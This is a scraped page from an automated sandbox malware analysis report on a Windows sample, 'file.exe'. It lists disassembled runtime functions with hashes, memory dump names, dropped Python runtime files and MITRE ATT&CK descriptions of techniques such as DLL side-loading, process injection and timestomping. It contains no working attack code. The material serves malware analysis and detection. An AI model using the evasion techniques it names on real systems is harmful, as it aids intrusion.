API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 353d784395b77eefcba7ec404c7e4e47dbaba59ece92a9373595b893a828088a
Instruction ID: a4a5144de1e8a38b8d93ed3175d110e9f001fb0ec8f18225f607f9422e44146f
Opcode Fuzzy Hash: 353d784395b77eefcba7ec404c7e4e47dbaba59ece92a9373595b893a828088a
Instruction Fuzzy Hash: ED112B36618B8582EB218F15F440269B7E5FB88B84F584235DF8D47BA9DF3CD5518B00

Function 00007FFE1A496690 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMON

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32 ref: 00007FFE1A4966D4
RaiseException.KERNEL32 ref: 00007FFE1A49671A

Strings

csm, xrefs: 00007FFE1A496707

Memory Dump Source

Source File: 00000001.00000002.3019088524.00007FFE1A491000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A490000, based on PE: true

Associated: 00000001.00000002.3019066108.00007FFE1A490000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3019117543.00007FFE1A4A1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3019139929.00007FFE1A4A6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3019163495.00007FFE1A4A7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe1a490000_file.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 51a2530866bc70b3fa6e7487cc130fe87b9602d28e5a22477376607ad08b6180
Instruction ID: c6ae5f3cf1e6f5d0984fc0c9f63c6c9bec17f8cba8e610e89111225bde2af73e
Opcode Fuzzy Hash: 51a2530866bc70b3fa6e7487cc130fe87b9602d28e5a22477376607ad08b6180
Instruction Fuzzy Hash: D9113D32608F8182EB218F16E440269B7A5FB88F94F5842B6DF8D07B68DF3DD965C700

Function 00007FF6399CFA4C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6399CFA7C
GetDriveTypeW.KERNEL32 ref: 00007FF6399CFABC

Strings

:, xrefs: 00007FF6399CFAA5

Memory Dump Source

Source File: 00000001.00000002.3016959860.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000001.00000002.3016941257.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017017692.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6399b0000_file.jbxd

Similarity

API ID: DriveType_invalid_parameter_noinfo
String ID: :
API String ID: 2595371189-336475711
Opcode ID: 229dc5225c97c31120184e1c5c073253f760aebc87e6502baf4f3d3b6f3e4c47
Instruction ID: 193f0fdcf3bfef65c6f0689e63a15f0c426b2e80a2f928c7c613a8be696dfaa6
Opcode Fuzzy Hash: 229dc5225c97c31120184e1c5c073253f760aebc87e6502baf4f3d3b6f3e4c47
Instruction Fuzzy Hash: 21014F22E1C24786FB20AF60986127E63A1EF58708F881035D54DC67DFEE7CE544EE14

Function 00007FFE14633864 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 26COMMON

Download Yara Rule

APIs

PyErr_SetString.PYTHON311 ref: 00007FFE1463389A

Strings

getsockaddrlen: bad family, xrefs: 00007FFE1463387A
getsockaddrlen: unknown BT protocol, xrefs: 00007FFE14633889

Memory Dump Source

Source File: 00000001.00000002.3018862329.00007FFE14631000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE14630000, based on PE: true

Associated: 00000001.00000002.3018842963.00007FFE14630000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.3018885111.00007FFE14638000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.3018906517.00007FFE14640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.3018928348.00007FFE14642000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe14630000_file.jbxd

Similarity

API ID: Err_String
String ID: getsockaddrlen: bad family$getsockaddrlen: unknown BT protocol
API String ID: 1450464846-3381576205
Opcode ID: ab91b222245d72fdf934647fcadf1ae56679d6275983197b65b3077e48878765
Instruction ID: e34f3dc0edfb5bbd4b6b811c99ef3c15deb863a5d07ba91be2f5fcc2f1b6d610
Opcode Fuzzy Hash: ab91b222245d72fdf934647fcadf1ae56679d6275983197b65b3077e48878765
Instruction Fuzzy Hash: 9BF0A9B2A08D8285F7258F1AC8D427C22A1EB47768FA054B1D50D8A7B0CF7CA4DD97C1

Function 00007FFE1A49EE00 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFE1A49F050: _IsNonwritableInCurrentImage.LIBCMT ref: 00007FFE1A49F110
Part of subcall function 00007FFE1A49F050: RtlUnwindEx.KERNEL32(?,?,?,?,?,?,?,00007FFE1A49EE15), ref: 00007FFE1A49F15F

Part of subcall function 00007FFE1A4969C0: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFE1A4925CE), ref: 00007FFE1A4969CE

terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1A49EE3A

Strings

f, xrefs: 00007FFE1A49EE15
csm, xrefs: 00007FFE1A49EE1B

Memory Dump Source

Source File: 00000001.00000002.3019088524.00007FFE1A491000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A490000, based on PE: true

Associated: 00000001.00000002.3019066108.00007FFE1A490000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3019117543.00007FFE1A4A1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3019139929.00007FFE1A4A6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3019163495.00007FFE1A4A7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe1a490000_file.jbxd

Similarity

API ID: CurrentImageNonwritableUnwindabortterminate
String ID: csm$f
API String ID: 4189928240-629598281
Opcode ID: 41dc89b1ce5f079b65ce2aaee024a8a434243f0f20765bf48ba2e403aae6c5bc
Instruction ID: e863c09ee791e49806a1a1d0e454b45d48bf709a91f6bd99d3db3ef8f0ecffb6
Opcode Fuzzy Hash: 41dc89b1ce5f079b65ce2aaee024a8a434243f0f20765bf48ba2e403aae6c5bc
Instruction Fuzzy Hash: B5E03771A0CB4241EF705B52A14513D6654AF0DFA4F1840F6D64906656DF3DD4B08601

Function 00007FFDFF160250 Relevance: 5.2, APIs: 4, Instructions: 234COMMON

Download Yara Rule

APIs

MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(?,?,00000000,?,?,00007FFDFF1601FA,?,?,?,?,?,?,?,?,?,00007FFDFF1785FA), ref: 00007FFDFF16035A
MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(?,?,00000000,?,?,00007FFDFF1601FA,?,?,?,?,?,?,?,?,?,00007FFDFF1785FA), ref: 00007FFDFF1603AE
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,?,?,00007FFDFF1601FA,?,?,?,?,?,?,?,?,?,00007FFDFF1785FA), ref: 00007FFDFF1AA8BC

Memory Dump Source

Source File: 00000001.00000002.3018679128.00007FFDFF151000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FFDFF150000, based on PE: true

Associated: 00000001.00000002.3018656665.00007FFDFF150000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018757970.00007FFDFF213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018794219.00007FFDFF24E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018816816.00007FFDFF251000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdff150000_file.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: 9bac3c82e8fba89b863ff65be1f8d92f0285a85df3371c0b963104779c4bd195
Instruction ID: 77d82d2df0f60f0204a47415f1616d050d1f2246c6ae2e2de1e27b303034b80c
Opcode Fuzzy Hash: 9bac3c82e8fba89b863ff65be1f8d92f0285a85df3371c0b963104779c4bd195
Instruction Fuzzy Hash: D1919423F0D28286F7B84B159074E3D5790EF55794F64533ADABE4ABD8CF3CA8928601

Function 00007FFDFF1786EB Relevance: 5.1, APIs: 4, Instructions: 71COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFDFF162070: HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00007FFDFF15F368,?,?,?), ref: 00007FFDFF162085

EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FFDFF178766
EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FFDFF1787A0
LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FFDFF1787D0
LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FFDFF1787DF

Memory Dump Source

Source File: 00000001.00000002.3018679128.00007FFDFF151000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FFDFF150000, based on PE: true

Associated: 00000001.00000002.3018656665.00007FFDFF150000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018757970.00007FFDFF213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018794219.00007FFDFF24E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018816816.00007FFDFF251000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdff150000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave$FreeHeap
String ID:
API String ID: 1946732658-0
Opcode ID: 5d6180ed48b53724b02512d2ffaf3866c7f057dbf093a598b205195df29c9a8e
Instruction ID: 1030ff7c1f22ac2c88b0fab9ed2db8a4728cbf0cb0b6c80b48481027d21889e4
Opcode Fuzzy Hash: 5d6180ed48b53724b02512d2ffaf3866c7f057dbf093a598b205195df29c9a8e
Instruction Fuzzy Hash: 93319F23F58602A6EB10DB11E860BB86360FF94B64F541231DA7EC2AE9DF7CE555C304

Function 00007FFE1A4969DC Relevance: 5.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FFE1A496859,?,?,?,?,00007FFE1A49FF42,?,?,?,?,?), ref: 00007FFE1A4969FB
SetLastError.KERNEL32(?,?,?,00007FFE1A496859,?,?,?,?,00007FFE1A49FF42,?,?,?,?,?), ref: 00007FFE1A496A84

Memory Dump Source

Source File: 00000001.00000002.3019088524.00007FFE1A491000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A490000, based on PE: true

Associated: 00000001.00000002.3019066108.00007FFE1A490000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3019117543.00007FFE1A4A1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3019139929.00007FFE1A4A6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3019163495.00007FFE1A4A7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe1a490000_file.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: bbe9895d534b658101cce7e74ca5bd95b80ee12bf15f37732e53d0ee5c009e2b
Instruction ID: 552bf713208c0e407db86e1aea98307fb72624e1e660d8ac2b99ab6a2acff6b5
Opcode Fuzzy Hash: bbe9895d534b658101cce7e74ca5bd95b80ee12bf15f37732e53d0ee5c009e2b
Instruction Fuzzy Hash: 9F112120F0DA5242FA749B27A844174A291AF8DFF4F0486F6D96F067F5DF2CA871D600

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\_MEI68922\VCRUNTIME140.dll

C:\Users\user\AppData\Local\Temp\_MEI68922\_bz2.pyd

C:\Users\user\AppData\Local\Temp\_MEI68922\_decimal.pyd

C:\Users\user\AppData\Local\Temp\_MEI68922\_hashlib.pyd

C:\Users\user\AppData\Local\Temp\_MEI68922\_lzma.pyd

C:\Users\user\AppData\Local\Temp\_MEI68922\_socket.pyd

C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-core-console-l1-1-0.dll

C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-core-datetime-l1-1-0.dll

C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-core-debug-l1-1-0.dll

C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-core-errorhandling-l1-1-0.dll

C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-core-fibers-l1-1-0.dll

C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-core-file-l1-1-0.dll

C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-core-file-l1-2-0.dll

C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-core-file-l2-1-0.dll

C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-core-handle-l1-1-0.dll

C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-core-heap-l1-1-0.dll

C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-core-interlocked-l1-1-0.dll

C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-core-libraryloader-l1-1-0.dll

C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-core-localization-l1-2-0.dll

C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-core-memory-l1-1-0.dll

Windows Analysis Report
file.exe